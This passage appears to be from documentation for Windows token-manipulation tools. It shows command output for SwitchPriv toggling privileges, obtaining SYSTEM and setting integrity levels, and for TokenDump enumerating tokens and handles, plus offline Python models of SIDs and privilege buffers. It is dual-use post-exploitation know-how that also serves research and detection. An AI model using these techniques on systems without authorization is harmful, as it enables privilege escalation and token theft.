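The lookup module, the -e option (which accepts lowercase input such as s-1-5-18 and reports each group as [VALID] before adding it) and the whoami /groups listing above all deal in SID strings of the form S-R-I-S1-...-Sn, and the last row of that listing, S-1-16-16384, is the integrity label that SwitchPriv's --integrity option (covered below) sets. The following Python is an added example, not S4uDelegator's or SwitchPriv's code: it parses and validates a SID string, normalises its case, encodes it into the binary SID layout Windows APIs consume (revision, sub-authority count, 48-bit big-endian identifier authority, little-endian sub-authorities), and resolves only the well-known SIDs and domain RIDs that appear on this page. Real name resolution needs LookupAccountSid; the table here is a constructed subset, and the mapping of SwitchPriv's 0..7 values to the label RIDs assumes its list is in ascending RID order, which the page's help output suggests but does not state.

```python
"""SID string parsing, validation and well-known SID resolution (added example)."""
import re
import struct

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$", re.IGNORECASE)

# Constructed subset of well-known SIDs, limited to those seen on this page.
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-5-2": "NT AUTHORITY\\NETWORK",
    "S-1-5-11": "NT AUTHORITY\\Authenticated Users",
    "S-1-5-15": "NT AUTHORITY\\This Organization",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
    "S-1-18-2": "Service asserted identity",
}
# Domain-relative RIDs (last sub-authority of an S-1-5-21-<domain>-<rid> SID).
DOMAIN_RIDS = {500: "Administrator", 512: "Domain Admins", 518: "Schema Admins",
               519: "Enterprise Admins", 520: "Group Policy Creator Owners",
               572: "Denied RODC Password Replication Group"}
# Mandatory label RIDs (S-1-16-<rid>); list index = SwitchPriv --integrity value (assumption).
INTEGRITY_LEVELS = [(0x0000, "Untrusted"), (0x1000, "Low"), (0x2000, "Medium"),
                    (0x2100, "Medium Plus"), (0x3000, "High"), (0x4000, "System"),
                    (0x5000, "Protected Process"), (0x7000, "Secure Process")]


class Sid:
    def __init__(self, revision, authority, subauthorities):
        self.revision, self.authority = revision, authority
        self.subauthorities = tuple(subauthorities)

    def __str__(self):   # canonical upper-case string form
        return "S-%d-%d-%s" % (self.revision, self.authority,
                               "-".join(str(s) for s in self.subauthorities))

    def __eq__(self, other):
        return isinstance(other, Sid) and str(self) == str(other)

    def to_bytes(self):
        """Binary SID as passed to Windows APIs (SID structure, 8 + 4*N bytes)."""
        return (struct.pack("<BB", self.revision, len(self.subauthorities))
                + self.authority.to_bytes(6, "big")
                + b"".join(struct.pack("<I", s) for s in self.subauthorities))


def parse_sid(text):
    """Parse a textual SID, case-insensitively; raise ValueError on malformed input."""
    m = SID_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a SID string: {text!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(s) for s in m.group(3).split("-")[1:]]
    if revision != 1 or not 1 <= len(subs) <= 15 or authority >= 1 << 48 \
            or any(s >= 1 << 32 for s in subs):
        raise ValueError(f"malformed SID: {text!r}")
    return Sid(revision, authority, subs)


def describe(sid):
    """Friendly name for the SIDs this example knows, else None."""
    key = str(sid)
    if key in WELL_KNOWN:
        return WELL_KNOWN[key]
    if sid.authority == 16 and len(sid.subauthorities) == 1:
        for rid, level in INTEGRITY_LEVELS:
            if rid == sid.subauthorities[0]:
                return f"Mandatory Label\\{level} Mandatory Level"
    if sid.authority == 5 and len(sid.subauthorities) == 5 and sid.subauthorities[0] == 21:
        rid = sid.subauthorities[-1]
        return "<domain>\\" + DOMAIN_RIDS.get(rid, f"RID {rid}")
    return None


def integrity_label_sid(level):
    """Label SID for a SwitchPriv-style --integrity value 0..7."""
    return Sid(1, 16, [INTEGRITY_LEVELS[level][0]])


def check_extra_groups(arg):
    """Validate a comma-separated -e style list: (canonical SID, name or None, ok) per item."""
    results = []
    for item in arg.split(","):
        try:
            sid = parse_sid(item)
            results.append((str(sid), describe(sid), True))
        except ValueError:
            results.append((item.strip(), None, False))
    return results


if __name__ == "__main__":
    for canonical, name, ok in check_extra_groups("s-1-5-18,S-1-5-19,bogus"):
        print(f"[{'VALID' if ok else 'INVALID'}] {name or '?'} (SID : {canonical})")
```

From a monitoring standpoint the interesting case is the one the transcript above demonstrates: a logon token for a domain account that also carries S-1-5-18. Parsing the group list of a token and flagging well-known service SIDs inside an interactive user's token is a cheap check for exactly this kind of S4U-built token.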

SwitchPriv

This tool enables or disables specific token privileges for a process:

C:\dev>SwitchPriv.exe -h

SwitchPriv - Tool to control token privileges.

Usage: SwitchPriv.exe [Options]

        -h, --help      : Displays this help message.
        -e, --enable    : Specifies token privilege to enable. Case insensitive.
        -d, --disable   : Specifies token privilege to disable. Case insensitive.
        -r, --remove    : Specifies token privilege to remove. Case insensitive.
        -f, --find      : Specifies token privilege to find.
        -p, --pid       : Specifies the target PID. Default specifies PPID.
        -i, --integrity : Specifies integrity level to set.
        -g, --get       : Flag to get available privileges for the target process.
        -s, --system    : Flag to run as "NT AUTHORITY\SYSTEM".
        -l, --list      : Flag to list values for --enable, --disable, --remove and --integrity options.

To list values for --enable, --disable, --remove and --integrity options, execute this tool with --list flag as follows:

C:\dev>SwitchPriv.exe -l

Available values for --enable, --disable, and --remove options:
    + CreateToken                    : Specifies SeCreateTokenPrivilege.
    + AssignPrimaryToken             : Specifies SeAssignPrimaryTokenPrivilege.
    + LockMemory                     : Specifies SeLockMemoryPrivilege.
    + IncreaseQuota                  : Specifies SeIncreaseQuotaPrivilege.
    + MachineAccount                 : Specifies SeMachineAccountPrivilege.
    + Tcb                            : Specifies SeTcbPrivilege.
    + Security                       : Specifies SeSecurityPrivilege.
    + TakeOwnership                  : Specifies SeTakeOwnershipPrivilege.
    + LoadDriver                     : Specifies SeLoadDriverPrivilege.

--snip--

Available values for --integrity option:
    + 0 : UNTRUSTED_MANDATORY_LEVEL
    + 1 : LOW_MANDATORY_LEVEL
    + 2 : MEDIUM_MANDATORY_LEVEL
    + 3 : MEDIUM_PLUS_MANDATORY_LEVEL
    + 4 : HIGH_MANDATORY_LEVEL
    + 5 : SYSTEM_MANDATORY_LEVEL
    + 6 : PROTECTED_MANDATORY_LEVEL
    + 7 : SECURE_MANDATORY_LEVEL

If you want to control privileges for another process, specify the target PID with the --pid option. For example, to enable SeUndockPrivilege for PID 7584, execute with the --enable option as follows:

C:\dev>SwitchPriv.exe -p 6968 -e undock

[>] Trying to enable SeUndockPrivilege.
    [*] Target PID   : 6968
    [*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.

To list the current token privileges of the target process, execute with the --get flag as follows:

C:\dev>SwitchPriv.exe -p 6968 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 6968
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

To perform any action as SYSTEM, set the --system flag as follows:

C:\dev>SwitchPriv.exe -p 1140 -g -s

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 1140
    [*] Process Name : svchost
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 28 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

To disable a privilege, use the --disable option. For example, to disable SeChangeNotifyPrivilege, execute as follows:

C:\dev>SwitchPriv.exe -p 8520 -d changenotify

[>] Trying to disable SeChangeNotifyPrivilege.
    [*] Target PID   : 8520
    [*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.


C:\dev>SwitchPriv.exe -p 8520 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 8520
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ================
SeShutdownPrivilege           Enabled
SeChangeNotifyPrivilege       EnabledByDefault
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege           Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

If you don't specify the --pid option, the tool targets its own parent process, as follows:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\dev>SwitchPriv.exe -e timezone

[>] Trying to enable SeTimeZonePrivilege.
    [*] Target PID   : 9468
    [*] Process Name : cmd
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Enabled

C:\dev>SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9468
    [*] Process Name : cmd
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

To remove a privilege, use the --remove option as follows:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Enabled

C:\dev>SwitchPriv.exe -r timezone

[>] Trying to remove SeTimeZonePrivilege.
    [*] Target PID   : 9788
    [*] Process Name : cmd
[+] SeTimeZonePrivilege is removed successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

To enable, disable or remove all available token privileges, specify all as the value of the --enable, --disable or --remove option:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

C:\dev>SwitchPriv.exe -e all

[>] Trying to enable all token privileges.
    [*] Target PID   : 9788
    [*] Process Name : cmd
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled

To find the processes that hold a specific privilege, use the --find option as follows:

C:\dev>SwitchPriv.exe -f createtoken

[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
    [*] csrss (PID : 800)
    [*] smss (PID : 660)
    [*] lsass (PID : 1088)
    [*] Memory Compression (PID : 3600)
    [*] csrss (PID : 868)
[*] Access is denied by following 2 process(es).
    [*] System (PID : 4)
    [*] Idle (PID : 0)
[*] Done.


C:\dev>SwitchPriv.exe -g -p 800

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 800
    [*] Process Name : csrss
[+] Got 30 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeCreateTokenPrivilege                    Disabled
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeRelabelPrivilege                        Disabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

If you want to set the integrity level of the target process, use the --integrity option as follows:

C:\dev>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


C:\dev>SwitchPriv.exe -i 1

[>] Trying to set integrity level.
    |-> Target PID   : 5144
    |-> Process Name : cmd
[>] Trying to set LOW_MANDATORY_LEVEL.
[+] LOW_MANDATORY_LEVEL is set successfully.

C:\dev>whoami /groups | findstr /i level
Mandatory Label\Low Mandatory Level                           Label            S-1-16-4096
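The privilege states printed by the -g flag (EnabledByDefault, Enabled), the effect of --enable, --disable and --remove, and the --integrity index to label-SID mapping, modelled in Python as an added example that is not PrivFu's own code. It decodes a constructed TOKEN_PRIVILEGES buffer (the layout GetTokenInformation returns) with the well-known privilege LUID values and attribute bits from winnt.h; the short-name lookup, the helper function names and the sample buffer are this example's own assumptions.

```python
"""Token bookkeeping behind SwitchPriv's options (added example, not PrivFu
code), run offline on a constructed TOKEN_PRIVILEGES buffer."""
import struct

# LUID_AND_ATTRIBUTES attribute bits (winnt.h)
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_REMOVED = 0x00000004
SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000
STATE_LABELS = [(SE_PRIVILEGE_ENABLED_BY_DEFAULT, "EnabledByDefault"), (SE_PRIVILEGE_ENABLED, "Enabled"),
                (SE_PRIVILEGE_REMOVED, "Removed"), (SE_PRIVILEGE_USED_FOR_ACCESS, "UsedForAccess")]

# Well-known privilege LUIDs (LowPart, HighPart 0) from winnt.h; subset
# covering the five privileges on the medium-integrity cmd token above.
WELL_KNOWN_LUIDS = {
    19: "SeShutdownPrivilege",
    23: "SeChangeNotifyPrivilege",
    25: "SeUndockPrivilege",
    33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege",
}

# Mandatory label RIDs (S-1-16-<rid>) in the index order of --integrity.
INTEGRITY_LEVELS = [
    ("UNTRUSTED_MANDATORY_LEVEL", 0x0000),
    ("LOW_MANDATORY_LEVEL", 0x1000),
    ("MEDIUM_MANDATORY_LEVEL", 0x2000),
    ("MEDIUM_PLUS_MANDATORY_LEVEL", 0x2100),
    ("HIGH_MANDATORY_LEVEL", 0x3000),
    ("SYSTEM_MANDATORY_LEVEL", 0x4000),
    ("PROTECTED_MANDATORY_LEVEL", 0x5000),
    ("SECURE_MANDATORY_LEVEL", 0x7000),
]

def integrity_sid(index):
    """--integrity index -> label SID, e.g. 1 -> S-1-16-4096 (Low)."""
    return f"S-1-16-{INTEGRITY_LEVELS[index][1]}"

def integrity_name_from_sid(sid):
    """Reverse lookup for the SID that whoami /groups prints (S-1-16-8192)."""
    rid = int(sid.rsplit("-", 1)[1])
    return {r: n for n, r in INTEGRITY_LEVELS}[rid]

def build_token_privileges(entries):
    """Constructed TOKEN_PRIVILEGES buffer from [(luid_low, attrs), ...]."""
    buf = struct.pack("<I", len(entries))
    for low, attrs in entries:
        buf += struct.pack("<IiI", low, 0, attrs)  # LowPart, HighPart, Attributes
    return buf

def parse_token_privileges(buf):
    """Decode TOKEN_PRIVILEGES (DWORD PrivilegeCount + 12-byte
    LUID_AND_ATTRIBUTES entries) into {privilege name: attributes}."""
    (count,) = struct.unpack_from("<I", buf, 0)
    privs = {}
    for i in range(count):
        low, high, attrs = struct.unpack_from("<IiI", buf, 4 + 12 * i)
        name = WELL_KNOWN_LUIDS.get(low) if high == 0 else None
        privs[name or f"Luid:{high:#010x}:{low:#010x}"] = attrs
    return privs

def state_string(attrs):
    """Render attributes the way SwitchPriv -g prints the State column."""
    return ", ".join(l for bit, l in STATE_LABELS if attrs & bit) or "Disabled"

def resolve_name(value):
    """Case-insensitive --list value -> full name ('timezone' -> 'SeTimeZonePrivilege')."""
    if value.lower() == "all":
        return "all"
    wanted = f"se{value.lower()}privilege"
    for full in WELL_KNOWN_LUIDS.values():
        if full.lower() == wanted:
            return full
    raise ValueError(f"unknown privilege value {value!r}")

def adjust(privs, action, name):
    """AdjustTokenPrivileges semantics behind --enable/--disable/--remove:
    enable/disable flip SE_PRIVILEGE_ENABLED; remove drops the entry, so the
    privilege cannot be re-enabled on this token (SE_PRIVILEGE_REMOVED).
    A privilege the token does not hold is an error (ERROR_NOT_ALL_ASSIGNED)."""
    result = dict(privs)
    for target in (list(result) if name == "all" else [name]):
        if target not in result:
            raise KeyError(f"{target} is not held by this token")
        if action == "enable":
            result[target] |= SE_PRIVILEGE_ENABLED
        elif action == "disable":
            result[target] &= ~SE_PRIVILEGE_ENABLED
        elif action == "remove":
            del result[target]
        else:
            raise ValueError(f"unknown action {action!r}")
    return result

# Constructed sample: the medium-integrity cmd token from the README.
SAMPLE_CMD_TOKEN = build_token_privileges(
    [(19, 0), (23, SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED), (25, 0), (33, 0), (34, 0)])
```

Replaying the README's sequence (enable timezone, disable changenotify, remove timezone, enable all) on SAMPLE_CMD_TOKEN reproduces the State columns shown above, including the fact that a removed privilege can no longer be enabled.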

TokenDump

Back to Top

Project

This tool is a utility to inspect token information:

C:\Dev>.\TokenDump.exe -h

TokenDump - Tool to dump processs token information.

Usage: TokenDump.exe [Options]

        -h, --help    : Displays this help message.
        -d, --debug   : Flag to enable SeDebugPrivilege.
        -e, --enum    : Flag to enumerate brief information tokens for processes or handles.
        -T, --thread  : Flag to scan thead tokens. Use with -e option.
        -H, --handle  : Flag to scan token handles. Use with -e option.
        -s, --scan    : Flag to get verbose information for a specific process, thread or handle.
        -a, --account : Specifies account name filter string. Use with -e flag.
        -p, --pid     : Specifies a target PID in decimal format. Use with -s flag.
        -t, --tid     : Specifies a target TID in decimal format. Use with -s flag and -p option.
        -v, --value   : Specifies a token handle value in hex format. Use with -s flag and -p option.

To enumerate the tokens of all processes, just set the -e flag:

C:\Dev>.\TokenDump.exe -e

[>] Trying to enumerate process token.

 PID Process Name                Token User                   Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3016 sihost.exe                  X64DEV\user                  Medium    False      False
 860 fontdrvhost.exe             Font Driver Host\UMFD-0      Low       False      True
 428 msedgewebview2.exe          X64DEV\user                  Low       True       False

--snip--

5612 Widgets.exe                 X64DEV\user                  Medium    False      False
2588 svchost.exe                 NT AUTHORITY\LOCAL SERVICE   System    False      False
9052 RuntimeBroker.exe           X64DEV\user                  Medium    False      False

[+] Got 157 token information.
[*] Found 7 account(s).
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\SYSTEM
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

If you want to enable SeDebugPrivilege first, so that protected processes can be inspected as well, set the -d flag as follows:

C:\Dev>.\TokenDump.exe -e -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Process Name                Token User                   Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3544 svchost.exe                 NT AUTHORITY\SYSTEM          System    False      False
6944 WmiPrvSE.exe                NT AUTHORITY\SYSTEM          System    False      False
3188 SystemInformer.exe          X64DEV\user                  Medium    False      False
7608 sppsvc.exe                  NT AUTHORITY\NETWORK SERVICE System    False      False
6948 SecurityHealthSystray.exe   X64DEV\user                  Medium    False      False
7228 svchost.exe                 X64DEV\user                  Medium    False      False

--snip--

When the -H flag is set together with the -e flag, TokenDump enumerates token handle information:

C:\Dev>.\TokenDump.exe -e -H

[>] Trying to enumerate token handles.

[Token Handle(s) - svchost.exe (PID: 2808)]

Handle Token User  Integrity Restricted AppContainer Token Type    Impersonation Level
====== =========== ========= ========== ============ ============= ===================
 0x4AC X64DEV\user Medium    False      False        Primary       Anonymous
 0x50C X64DEV\user Medium    False      False        Primary       Anonymous
 0x510 X64DEV\user Medium    False      False        Primary       Anonymous
 0x514 X64DEV\user Medium    False      False        Primary       Anonymous

--snip--

[Token Handle(s) - msedgewebview2.exe (PID: 9804)]

Handle Token User  Integrity Restricted AppContainer Token Type    Impersonation Level
====== =========== ========= ========== ============ ============= ===================
 0x7D4 X64DEV\user Low       True       False        Impersonation Impersonation
 0x7D8 X64DEV\user Low       True       False        Primary       Anonymous
 0xBCC X64DEV\user Low       True       False        Impersonation Impersonation
 0xBDC X64DEV\user Low       True       False        Primary       Anonymous
 0xCF8 X64DEV\user Low       True       False        Impersonation Impersonation
 0xD00 X64DEV\user Low       True       False        Primary       Anonymous

[+] Got 910 handle(s).
[*] Found 7 account(s).
    [*] NT AUTHORITY\SYSTEM
    [*] X64DEV\user
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

To enumerate impersonation tokens on threads, set the -T flag together with the -e flag as follows:

C:\Dev>.\TokenDump.exe -e -T

[>] Trying to enumerate thread tokens.

 PID  TID Process Name      Token User          Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
6552 5668 TokenStealing.exe NT AUTHORITY\SYSTEM System    Impersonation

[+] Got 1 handle(s).
[*] Found 1 account(s).
    [*] NT AUTHORITY\SYSTEM
[*] Done.

If you want to filter these results by token user name, pass a filter string as the -a option value as follows:

C:\Dev>.\TokenDump.exe -e -a network -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Process Name Token User                   Integrity Restricted AppContainer
==== ============ ============================ ========= ========== ============
3404 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
4656 msdtc.exe    NT AUTHORITY\NETWORK SERVICE System    False      False
1628 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
2916 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
2464 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
4592 WmiPrvSE.exe NT AUTHORITY\NETWORK SERVICE System    False      False
7840 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
7408 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
 940 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False

[+] Got 9 token information.
[*] Found 7 account(s).
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\SYSTEM
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

C:\Dev>.\TokenDump.exe -e -a network -H -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.

[Token Handle(s) - lsass.exe (PID: 704)]

Handle Token User                   Integrity Restricted AppContainer Token Type    Impersonation Level
====== ============================ ========= ========== ============ ============= ===================
 0x8C4 NT AUTHORITY\NETWORK SERVICE System    False      False        Impersonation Impersonation

--snip--

[Token Handle(s) - svchost.exe (PID: 7408)]

Handle Token User                   Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ========== ===================
  0xB0 NT AUTHORITY\NETWORK SERVICE System    False      False        Primary    Anonymous

[+] Got 29 handle(s).
[*] Found 7 account(s).
    [*] NT AUTHORITY\SYSTEM
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
    [*] NT AUTHORITY\LOCAL SERVICE
[*] Done.

To get verbose information for a specific process, set the -s flag and pass the target PID as the -p option value:

C:\Dev>.\TokenDump.exe -s -p 5520

[>] Trying to dump process token information.

[Token Information for ShellExperienceHost.exe (PID: 5520)]

ImageFilePath       : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
CommandLine         : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Token User          : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner         : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Primary Group       : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type          : Primary
Impersonation Level : Anonymous
Token ID            : 0x00000000002FCAC9
Authentication ID   : 0x000000000001E809
Original ID         : 0x00000000000003E7
Modified ID         : 0x00000000002FCAB9
Integrity Level     : Low
Session ID          : 1
Elevation Type      : Limited
Elevated            : False
Restricted          : False
AppContainer        : True
AppContainer Name   : microsoft.windows.shellexperiencehost_cw5n1h2txyewy
AppContainer SID    : S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708
AppContainer Number : 6
Has Linked Token    : True
Token Source        : User32
Token Source ID     : 0x000000000001E500

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                State
    ============================= =========================
    SeChangeNotifyPrivilege       EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    X64DEV\None                                                   Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account and member of Administrators group UseForDenyOnly
    BUILTIN\Administrators                                        UseForDenyOnly
    BUILTIN\Users                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\LogonSessionId_0_124092                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
